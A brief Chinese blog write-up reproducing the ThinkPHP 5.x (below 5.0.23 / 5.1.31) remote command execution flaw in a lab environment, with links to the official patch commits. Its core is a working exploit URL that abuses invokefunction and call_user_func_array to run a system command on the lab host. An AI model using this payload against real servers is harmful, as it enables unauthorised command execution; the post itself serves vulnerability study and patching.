标签:art oss commit 原理 php 访问 frame code dex
0x00复现环境ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell)
点击start to hack
进入环境页面 run the project 然后访问给出的target address
1.执行系统命令显示目录下文件 http://aaa.vsplate.me:52763/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
想你所想,发挥创意
待分析
Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f
Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815
【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)
标签:art oss commit 原理 php 访问 frame code dex
原文地址:http://blog.51cto.com/11834557/2328927